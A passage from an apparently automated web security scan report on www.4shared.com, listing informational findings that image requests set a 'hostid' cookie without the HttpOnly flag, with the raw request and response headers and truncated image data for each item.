Path:	/images/cornerTR.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=182102692; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerTR.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:54 GMT; Path=/
Set-Cookie: hostid=182102692; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:54 GMT
ETag: W/"409-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 409
Date: Fri, 29 Jul 2011 14:07:54 GMT

GIF89a.....4.~.|}{|~stw|}.fgjwxz}~.yz|vwzqruijmlmorsv^_auvxbceghkrsulmp}~.\]_oprz{|pqtvwxyz{.........{|...............WX\tuxstvxy{pqsvwyfgiqrt~.Z[]......~.z{}z{~NOS...............................
...[SNIP]...

6.57. http://www.4shared.com/images/crn1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/crn1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-754302653; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/crn1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:58 GMT; Path=/
Set-Cookie: hostid=-754302653; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:58 GMT
ETag: W/"616-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 616
Date: Fri, 29 Jul 2011 14:07:58 GMT

GIF89a..&....~.......z{}NOSfgiZ[]qrtXY\wxz~....}~.pqs...stw`adijm|}STX...~.pqt...{|fgj...{{}|}.......lmpvwyxy{VVZbcePPT{|~wwzqruyz}hil...uvyZ[_............RSV...klncdgttw...mnpabd......yz{...VWZ}
...[SNIP]...

6.58. http://www.4shared.com/images/crn2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/crn2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-364190340; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/crn2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:59 GMT; Path=/
Set-Cookie: hostid=-364190340; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:59 GMT
ETag: W/"416-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 416
Date: Fri, 29 Jul 2011 14:07:58 GMT

GIF89a..&....~..........z{}NOSfgiZ[]qrt}~.{||}.pqt~.|}stwvwyhiluvybceklnwxzRSV^_ayz}qrupqsabd\]_mnpjkmz{~hikxy{ghj...stvXY\PQUopsWXZlmp{|~rsu...}~.QRU...yy|...[\^tuwwx{............................
...[SNIP]...

6.59. http://www.4shared.com/images/crn3.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/crn3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=628810834; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/crn3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:58 GMT; Path=/
Set-Cookie: hostid=628810834; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:58 GMT
ETag: W/"1085-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1085
Date: Fri, 29 Jul 2011 14:07:57 GMT

GIF89a..&.......NOSfgimnpZ[]pqswxz~.z{}pqt|}}~.XY\uvyabdstw~.cdgRSVhil...SUX...`adtuw^_afgj...xy{...[[_klnvwybce......{|QSV{{}yy|\]_...jjm^^bz{~mmqlmpqruopsPQUPPTnnpyz}VWZ......ghjhikjkm|}.......[
...[SNIP]...

6.60. http://www.4shared.com/images/div2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/div2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1038299048; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/div2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:59 GMT; Path=/
Set-Cookie: hostid=-1038299048; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:59 GMT
ETag: W/"345-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 345
Date: Fri, 29 Jul 2011 14:07:59 GMT

GIF89a.......~..........~.|}}~.z{}pqtuvyabdklnhilRSV|}.stwfgiwxzpqs^_avwyxy{bcejkmNOSqrumnpyz}tuwXY\QRUopsPQUz{~lmp{|yy|...WXZ...VWZ_`b...xy|mmp............nor.....................................
...[SNIP]...

6.61. http://www.4shared.com/images/divtop.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/divtop.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=161347362; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/divtop.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:53 GMT; Path=/
Set-Cookie: hostid=161347362; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:53 GMT
ETag: W/"124-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 124
Date: Fri, 29 Jul 2011 14:07:53 GMT

GIF89a.........................vwyqrtz{}NOSpqsfgi~.Z[]z{~...!.......,..........)P.i.u8....G(.d..h...Q........m.9O...P..D..;

6.62. http://www.4shared.com/images/docImg1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/docImg1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=2111058953; Expires=Mon, 26-Jul-2021 14:08:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/docImg1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:02 GMT; Path=/
Set-Cookie: hostid=2111058953; Expires=Mon, 26-Jul-2021 14:08:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:02 GMT
ETag: W/"1734-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 1734
Date: Fri, 29 Jul 2011 14:08:01 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

6.63. http://www.4shared.com/images/docImg2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/docImg2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=2006046; Expires=Mon, 26-Jul-2021 14:08:03 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/docImg2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:03 GMT; Path=/
Set-Cookie: hostid=2006046; Expires=Mon, 26-Jul-2021 14:08:03 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:03 GMT
ETag: W/"835-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 835
Date: Fri, 29 Jul 2011 14:08:03 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

6.64. http://www.4shared.com/images/docImg4.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/docImg4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1009900101; Expires=Mon, 26-Jul-2021 14:08:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/docImg4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:04 GMT; Path=/
Set-Cookie: hostid=-1009900101; Expires=Mon, 26-Jul-2021 14:08:04 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:04 GMT
ETag: W/"15891-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 15891
Date: Fri, 29 Jul 2011 14:08:03 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

6.65. http://www.4shared.com/images/docScr1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/docScr1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1269996174; Expires=Mon, 26-Jul-2021 14:08:09 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/docScr1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:09 GMT; Path=/
Set-Cookie: hostid=-1269996174; Expires=Mon, 26-Jul-2021 14:08:09 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:09 GMT
ETag: W/"9660-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 9660
Date: Fri, 29 Jul 2011 14:08:08 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

6.66. http://www.4shared.com/images/feat1doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/feat1doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1033795789; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat1doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:06 GMT; Path=/
Set-Cookie: hostid=1033795789; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:06 GMT
ETag: W/"1117-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1117
Date: Fri, 29 Jul 2011 14:08:05 GMT

GIF89a.......~.......z{~stwjkncdf...8G.ES.............Xd................IHH...............jv.......x..337Z[]...qrur}.NOQfgi}~.......uvx...z{}al.~....vxz...{|M[.ku.mnqyz}|..QRUnpr|}....STX...]^`|}.
...[SNIP]...

6.67. http://www.4shared.com/images/feat1mus.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/feat1mus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1895159666; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat1mus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:56 GMT; Path=/
Set-Cookie: hostid=-1895159666; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:56 GMT
ETag: W/"1121-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1121
Date: Fri, 29 Jul 2011 14:07:55 GMT

GIF89a.......~.......z{~stwjkncdf...GU............................Ye.........................ht....x..Z[]4C.......qrt...fgiNOQP]....r}.<K.}~.z{}tux`l..........~.{|ku.mnqPQU...yz||}.opr...?N.wxzhik]
...[SNIP]...

6.68. http://www.4shared.com/images/feat2doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/feat2doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=27019734; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat2doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:06 GMT; Path=/
Set-Cookie: hostid=27019734; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:06 GMT
ETag: W/"1361-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1361
Date: Fri, 29 Jul 2011 14:08:06 GMT

GIF89a..-.......stwz{~jkn...cdfhik}sg...vwy.{m.wx...~............u..w|stRSV.........}p`?N....tdLrsu......z}.L<)efi.t]..
~..
.....KM]......`ad..._bumnp...H;*WX[...ghj..... ..ropr.....|qt.vy.....}m.
...[SNIP]...

6.69. http://www.4shared.com/images/feat3.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/feat3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=522532646; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:57 GMT; Path=/
Set-Cookie: hostid=522532646; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:57 GMT
ETag: W/"798-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 798
Date: Fri, 29 Jul 2011 14:07:57 GMT

GIF89a..-.........cdfjknz{~...stw.........vwy.........~.......efimnp......ghj......WX[.........`ad...............{|~xy{UVZ...~~.TUX...bcf.........\]`...ppsRSWYZ^...............hil......kknZZ^...opr^
...[SNIP]...

6.70. http://www.4shared.com/images/feat3doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/feat3doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1643524810; Expires=Mon, 26-Jul-2021 14:08:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat3doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:07 GMT; Path=/
Set-Cookie: hostid=-1643524810; Expires=Mon, 26-Jul-2021 14:08:07 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:07 GMT
ETag: W/"782-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 782
Date: Fri, 29 Jul 2011 14:08:06 GMT

GIF89a..-.........cdfjknstwz{~...............QRU.vk\]`......UVY............YZ]vVG.T=...~..gY`ad............WX[...efivwymnq.....................rsu...ghj.........xy{.........opr.M8.........{|~...pqs.
...[SNIP]...

6.71. http://www.4shared.com/images/feat4.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/feat4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=2032790688; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat4.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:57 GMT; Path=/
Set-Cookie: hostid=2032790688; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:57 GMT
ETag: W/"1677-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1677
Date: Fri, 29 Jul 2011 14:07:57 GMT

GIF89a.......~.......z{~cdfjknstw.......................NOSghj......mnq[\^rsuQRU{|~~....}~.......XY]abe......yz|...rsv......uvxefi......JKM...kln|}..........ops......ijm...xy{...............|}....
...[SNIP]...

6.72. http://www.4shared.com/images/featbg1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/featbg1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-973451449; Expires=Mon, 26-Jul-2021 14:08:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featbg1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:17 GMT; Path=/
Set-Cookie: hostid=-973451449; Expires=Mon, 26-Jul-2021 14:08:17 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:17 GMT
ETag: W/"269-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 269
Date: Fri, 29 Jul 2011 14:08:16 GMT

GIF89a..-....~..........1@....O^.:I.MZ....BQ.......ny....u.....Sa.bo.jv.Xe.IW.^k....2B.r|./>.7G.......[h.......?O.<K.FT.......y..}..5E....fr...........................................................
...[SNIP]...

6.73. http://www.4shared.com/images/featbg2mus.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/featbg2mus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1161910901; Expires=Mon, 26-Jul-2021 14:08:18 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featbg2mus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:18 GMT; Path=/
Set-Cookie: hostid=-1161910901; Expires=Mon, 26-Jul-2021 14:08:18 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:18 GMT
ETag: W/"1574-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1574
Date: Fri, 29 Jul 2011 14:08:18 GMT

GIF89a..-....~....vvx...mnp...efixy{...RSW^_b`adssv~~.......pqs...jkn...TUY............\]`......cdgVVZ......XX\YZ^...WX[{{~...hhkUWZ...{|~ccg......ZZ^...............hil......QRU[]`......SUX...QRV....
...[SNIP]...

6.74. http://www.4shared.com/images/featimg1doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/featimg1doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-902995665; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg1doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
